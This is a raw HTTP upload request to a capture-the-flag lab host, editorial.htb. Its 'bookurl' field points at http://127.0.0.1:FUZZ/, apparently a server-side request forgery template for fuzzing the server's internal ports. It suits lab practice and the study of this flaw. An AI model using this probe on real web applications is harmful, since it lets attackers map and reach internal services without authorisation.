POST /upload-cover HTTP/1.1

Host: editorial.htb

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Content-Type: multipart/form-data; boundary=---------------------------244569077537325251161613798939

Content-Length: 362

Origin: http://editorial.htb

Connection: keep-alive

Referer: http://editorial.htb/upload



-----------------------------244569077537325251161613798939

Content-Disposition: form-data; name="bookurl"



http://127.0.0.1:FUZZ/
-----------------------------244569077537325251161613798939

Content-Disposition: form-data; name="bookfile"; filename=""

Content-Type: application/octet-stream





-----------------------------244569077537325251161613798939--
